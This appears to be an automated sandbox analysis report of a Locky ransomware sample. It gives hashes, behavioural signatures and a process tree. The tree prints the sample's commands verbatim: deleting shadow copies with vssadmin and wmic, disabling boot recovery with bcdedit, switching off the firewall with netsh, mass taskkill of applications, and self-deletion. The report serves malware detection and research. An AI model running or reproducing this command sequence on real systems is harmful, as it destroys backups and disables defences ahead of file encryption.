Analysis
-
max time kernel
91s -
max time network
96s -
platform
windows10-2004_x64 -
resource
win10v2004-20231020-en -
resource tags
arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system -
submitted
29-10-2023 19:07
Static task
static1
Behavioral task
behavioral1
Sample
b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe
Resource
win10v2004-20231020-en
General
-
Target
b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe
-
Size
169KB
-
MD5
98562209465bec53327e65649a2b8829
-
SHA1
3a47656ed3df213bd934aa01078a863568fe9f2b
-
SHA256
b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe
-
SHA512
c11ce14f9cb75df2bc9bd81971c1f8fa885815715f389eb8e796e0f657de59756b36a6f896c216a03c7be7bb3ddff9b8a47aee71146760e4f4d9c6bdc0ff2cc3
-
SSDEEP
3072:iFgiMd04bHHr/QFDtaruNyXgs7WL61fXbEiVkYELY2P+gA/PF:UE3bHL/ngsu61kYELNmhF
Malware Config
Extracted
C:\Users\Admin\Music\!!Read_Me.CBF5C.html
Signatures
-
Locky
Ransomware strain released in 2016, with advanced features like anti-analysis.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 4656 bcdedit.exe 4692 bcdedit.exe -
Renames multiple (164) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Drops file in Program Files directory 1 IoCs
Processes:
b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exedescription ioc process File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Configuration\configuration.sqlite b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 4780 vssadmin.exe -
Kills process with taskkill 13 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 3988 taskkill.exe 1264 taskkill.exe 4684 taskkill.exe 1588 taskkill.exe 1912 taskkill.exe 224 taskkill.exe 1352 taskkill.exe 3492 taskkill.exe 1084 taskkill.exe 3540 taskkill.exe 1856 taskkill.exe 3068 taskkill.exe 4024 taskkill.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exepid process 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe -
Suspicious use of AdjustPrivilegeToken 58 IoCs
Processes:
WMIC.exevssvc.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exedescription pid process Token: SeIncreaseQuotaPrivilege 5008 WMIC.exe Token: SeSecurityPrivilege 5008 WMIC.exe Token: SeTakeOwnershipPrivilege 5008 WMIC.exe Token: SeLoadDriverPrivilege 5008 WMIC.exe Token: SeSystemProfilePrivilege 5008 WMIC.exe Token: SeSystemtimePrivilege 5008 WMIC.exe Token: SeProfSingleProcessPrivilege 5008 WMIC.exe Token: SeIncBasePriorityPrivilege 5008 WMIC.exe Token: SeCreatePagefilePrivilege 5008 WMIC.exe Token: SeBackupPrivilege 5008 WMIC.exe Token: SeRestorePrivilege 5008 WMIC.exe Token: SeShutdownPrivilege 5008 WMIC.exe Token: SeDebugPrivilege 5008 WMIC.exe Token: SeSystemEnvironmentPrivilege 5008 WMIC.exe Token: SeRemoteShutdownPrivilege 5008 WMIC.exe Token: SeUndockPrivilege 5008 WMIC.exe Token: SeManageVolumePrivilege 5008 WMIC.exe Token: 33 5008 WMIC.exe Token: 34 5008 WMIC.exe Token: 35 5008 WMIC.exe Token: 36 5008 WMIC.exe Token: SeBackupPrivilege 1468 vssvc.exe Token: SeRestorePrivilege 1468 vssvc.exe Token: SeAuditPrivilege 1468 vssvc.exe Token: SeIncreaseQuotaPrivilege 5008 WMIC.exe Token: SeSecurityPrivilege 5008 WMIC.exe Token: SeTakeOwnershipPrivilege 5008 WMIC.exe Token: SeLoadDriverPrivilege 5008 WMIC.exe Token: SeSystemProfilePrivilege 5008 WMIC.exe Token: SeSystemtimePrivilege 5008 WMIC.exe Token: SeProfSingleProcessPrivilege 5008 WMIC.exe Token: SeIncBasePriorityPrivilege 5008 WMIC.exe Token: SeCreatePagefilePrivilege 5008 WMIC.exe Token: SeBackupPrivilege 5008 WMIC.exe Token: SeRestorePrivilege 5008 WMIC.exe Token: SeShutdownPrivilege 5008 WMIC.exe Token: SeDebugPrivilege 5008 WMIC.exe Token: SeSystemEnvironmentPrivilege 5008 WMIC.exe Token: SeRemoteShutdownPrivilege 5008 WMIC.exe Token: SeUndockPrivilege 5008 WMIC.exe Token: SeManageVolumePrivilege 5008 WMIC.exe Token: 33 5008 WMIC.exe Token: 34 5008 WMIC.exe Token: 35 5008 WMIC.exe Token: 36 5008 WMIC.exe Token: SeDebugPrivilege 1264 taskkill.exe Token: SeDebugPrivilege 1352 taskkill.exe Token: SeDebugPrivilege 3068 taskkill.exe Token: SeDebugPrivilege 1588 taskkill.exe Token: SeDebugPrivilege 3988 taskkill.exe Token: SeDebugPrivilege 1084 taskkill.exe Token: SeDebugPrivilege 3492 taskkill.exe Token: SeDebugPrivilege 224 taskkill.exe Token: SeDebugPrivilege 4024 taskkill.exe Token: SeDebugPrivilege 1856 taskkill.exe Token: SeDebugPrivilege 1912 taskkill.exe Token: SeDebugPrivilege 3540 taskkill.exe Token: SeDebugPrivilege 4684 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 4204 wrote to memory of 2812 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 2812 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 260 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 260 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 4276 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 4276 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 3684 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 3684 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 1064 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 1064 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 2812 wrote to memory of 4780 2812 cmd.exe vssadmin.exe PID 2812 wrote to memory of 4780 2812 cmd.exe vssadmin.exe PID 4276 wrote to memory of 4656 4276 cmd.exe bcdedit.exe PID 4276 wrote to memory of 4656 4276 cmd.exe bcdedit.exe PID 1064 wrote to memory of 4664 1064 cmd.exe netsh.exe PID 1064 wrote to memory of 4664 1064 cmd.exe netsh.exe PID 3684 wrote to memory of 4692 3684 cmd.exe bcdedit.exe PID 3684 wrote to memory of 4692 3684 cmd.exe bcdedit.exe PID 260 wrote to memory of 5008 260 cmd.exe WMIC.exe PID 260 wrote to memory of 5008 260 cmd.exe WMIC.exe PID 4204 wrote to memory of 4696 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 4696 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 4696 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 1184 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 1184 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 1184 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 4356 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 4356 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 4356 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 3352 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 3352 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 3352 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 4788 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 4788 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 4788 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 1872 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 1872 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 1872 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 976 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 976 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 976 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 2376 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 2376 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 2376 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 3816 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 3816 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 3816 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 3828 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 3828 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 3828 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 3368 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 3368 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 3368 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 3584 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 3584 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 3584 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 2112 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 2112 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 4204 wrote to memory of 2112 4204 b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe cmd.exe PID 2112 wrote to memory of 1856 2112 cmd.exe taskkill.exe PID 2112 wrote to memory of 1856 2112 cmd.exe taskkill.exe PID 2112 wrote to memory of 1856 2112 cmd.exe taskkill.exe PID 3816 wrote to memory of 3068 3816 cmd.exe taskkill.exe PID 3816 wrote to memory of 3068 3816 cmd.exe taskkill.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe"C:\Users\Admin\AppData\Local\Temp\b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4204 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c vssadmin delete shadows /all /quiet2⤵
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:4780 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c wmic shadowcopy delete /nointeractive2⤵
- Suspicious use of WriteProcessMemory
PID:260 -
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete /nointeractive3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5008 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c bcdedit /set {current} bootstatuspolicy ignoreallfailures2⤵
- Suspicious use of WriteProcessMemory
PID:4276 -
C:\Windows\system32\bcdedit.exebcdedit /set {current} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
PID:4656 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c bcdedit /set {current} recoveryenabled no2⤵
- Suspicious use of WriteProcessMemory
PID:3684 -
C:\Windows\system32\bcdedit.exebcdedit /set {current} recoveryenabled no3⤵
- Modifies boot configuration data using bcdedit
PID:4692 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c netsh advfirewall set allprofiles state off2⤵
- Suspicious use of WriteProcessMemory
PID:1064 -
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
PID:4664 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im mys*2⤵
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mys*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1856 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im post*2⤵PID:3584
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im post*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4684 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im vee*2⤵PID:3368
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vee*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3540 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im python*2⤵PID:3828
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im python*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1084 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im java*2⤵
- Suspicious use of WriteProcessMemory
PID:3816 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im java*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3068 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im apache*2⤵PID:2376
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im apache*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1264 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im tomcat*2⤵PID:976
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tomcat*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1588 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im sql*2⤵PID:1872
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sql*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4024 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im Exchange*2⤵PID:4788
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Exchange*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3492 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im excel*2⤵PID:3352
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im excel*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1352 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im winword*2⤵PID:4356
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im winword*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:224 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im powerpnt*2⤵PID:1184
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im powerpnt*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1912 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im note*2⤵PID:4696
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im note*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3988 -
C:\Windows\SysWOW64\cmd.execmd.exe /c ping 127.0.0.1>nul & del /q C:\Users\Admin\AppData\Local\Temp\b5466ce462df16b3a29f22192b1291d70479cacf35bd5e937f35b2567da948fe.exe2⤵PID:5668
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.13⤵
- Runs ping.exe
PID:5712
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1468
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Music\!!Read_Me.CBF5C.htmlFilesize
4KB
MD54f72901ab4e11b9835d9055f2ec1418e
SHA168f8bbf133682edab9c0d47d0c4c9163e84802ed
SHA256854cd078b76f87f92a9f63e1d79852e4abab5fd03df0d40981c5847973083f66
SHA51255dfc457e2f4fdd644ef7c3165e9a71cb86feaf79c07c2cf5ed60599cbf18d5cdc2a2d24fad4d1a09c7d796f3ef1e16e633e42532688afa79daed362c72a4df5
-
memory/4204-0-0x0000000010000000-0x000000001001C000-memory.dmpFilesize
112KB